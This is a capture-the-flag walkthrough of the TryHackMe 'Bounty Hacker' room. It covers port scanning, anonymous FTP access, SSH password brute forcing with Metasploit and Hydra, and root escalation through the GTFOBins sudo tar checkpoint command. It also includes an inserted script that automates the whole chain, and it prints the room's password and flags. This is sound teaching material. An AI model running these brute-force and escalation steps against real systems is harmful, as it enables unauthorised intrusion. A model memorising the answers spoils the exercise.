TryHackMe - Bounty Hacker

Berat Arslan
4 min readJan 23, 2024


“Bounty Hacker” on TryHackMe is an easy-difficulty room. This article is my walkthrough of it.

This is my first English content, so please let me know if I have made any spelling or sentence mistakes. (I would also like to point out that I used a translator.)

I start with an Nmap scan. -sS is a SYN scan and needs root, -sV grabs service banners and -Pn skips host discovery so the scan runs even if the box drops ping:

nmap -sS -sV -Pn -v <target_ip>

The scan results show that FTP, SSH and HTTP are open.

I look at the website and its source code and run a directory scan with Gobuster, but I find nothing except the /images directory.

I had already noticed /images in the path of the image when I looked at the page source, so that was nothing new.

From this point on the remaining attack surface is FTP and SSH, so I try an anonymous login directly over FTP.

The connection is accepted: anonymous login works.

With this simple method you could log in to a subdomain of NASA in 2023, which is very funny.

After connecting I list the directory: there are two .txt files, which I download to my machine and read.

The file named “locks.txt” is, as the name suggests, a list of passwords.
The file named “task.txt” contains the username hint we can use for the SSH connection.

Answers → lin & SSH (our first two fillable answers!)

locks.txt
task.txt

The only thing missing for the SSH connection is the password, so I brute-force it from the list.

For the brute force I can use Hydra or Metasploit; I choose Metasploit.

I select the auxiliary/scanner/ssh/ssh_login module, set RHOSTS to the target, USERNAME to lin and PASS_FILE to locks.txt, and run it.

A session comes back quickly.

After finding the password, we can either use the session Metasploit provides or open a fresh SSH connection from a clean terminal and continue from there.

Answer → RedDr4gonSynd1cat3

I open a new SSH connection with the credentials I found, look around the home directory and get the first flag from user.txt.

Answer → THM{CR1M3_SyNd1C4T3}

Now it's time for privilege escalation, and there are a few ways to try. I start by looking for SUID binaries with

find / -perm /4000 2>/dev/null

and then it occurs to me to run sudo -l. After entering the lin user's password it returns output with no permission error: lin may run /bin/tar as root on bountyhacker.

I will become root via /bin/tar.

GTFOBins (https://gtfobins.github.io/gtfobins/tar/#sudo) has a sudo entry for tar. I copy the command under “sudo” into my terminal as-is and ta-da! I am root.
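The whole path through the room as one script, added here as an example and not code from the original post. It assumes the room IP is passed as the first argument and that nmap, curl, hydra and ssh are installed. The locks.txt and sudo -l samples inside the script are constructed (they mimic the shape of the real files so the two helpers can be exercised offline); the username lin and the file names come from the post, and the tar command is the GTFOBins sudo entry the post points to.

```shell
#!/bin/sh
# Added example for the Bounty Hacker workflow; not code from the original post.
# Assumptions: room IP in $1; nmap, curl, hydra and ssh installed; "lin",
# locks.txt and task.txt are taken from the post.
set -eu

# Normalise a password list pulled off FTP: strip CR (Windows line endings),
# blank lines and duplicates so hydra never wastes an attempt on a bad line.
clean_wordlist() {
    cat -- "$@" | tr -d '\r' | awk 'NF && !seen[$0]++'
}

# Pull the binaries a user may run through sudo out of `sudo -l` output,
# e.g. "    (root) /bin/tar" -> "/bin/tar", dropping tags such as NOPASSWD:.
sudo_targets() {
    awk '
        /may run the following commands/ { f = 1; next }
        f && /^[ \t]*\(/ {
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "")     # "(root)" or "(ALL : ALL)"
            sub(/^([A-Z]+:[ \t]*)+/, "")          # "NOPASSWD:", "SETENV:" ...
            print
        }' "$@"
}

# Constructed `sudo -l` output in the shape the post describes (lin may run
# /bin/tar as root on bountyhacker), so the parser can be tried offline.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
EOF
}

# Constructed password list with the CRLF, blank-line and duplicate noise
# that dumped files usually carry (only the real answer is from the post).
sample_locks() {
    printf 'Dr4g0nFist\r\n\r\nRedDr4gonSynd1cat3\r\nDr4g0nFist\r\n'
}

# The room end to end. -sS needs root; -t 4 keeps hydra under sshd's
# default MaxStartups so attempts are not silently dropped.
run_room() {
    target=$1
    nmap -sS -sV -Pn -v "$target"
    curl -s --list-only "ftp://$target/"          # anonymous FTP listing
    curl -s -O "ftp://$target/locks.txt" -O "ftp://$target/task.txt"
    clean_wordlist locks.txt > locks.clean
    hydra -l lin -P locks.clean -t 4 "ssh://$target"
    # Then, logged in as lin with the password hydra found:
    #   sudo -l | sudo_targets     -> /bin/tar
    #   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
    # (the GTFOBins "sudo" entry for tar: the checkpoint action runs /bin/sh as root)
}

if [ "$#" -ge 1 ]; then run_room "$1"; fi
```

Run it as `sh bounty.sh <target_ip>`; with no argument it only defines the helpers, so `sample_sudo_l | sudo_targets` can be used to check the parser before pointing it at a real box. Cleaning the wordlist first matters in practice: a stray `\r` on every line makes each candidate wrong and a brute force that "should" work fails silently.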

As root, I read /root/root.txt and get the last flag.

Answer → THM{80UN7Y_h4cK3r}

I hope I have not made any spelling mistakes or given any misinformation. Please let me know if you notice any omissions or errors.

For suggestions and questions, you can reach me on LinkedIn.
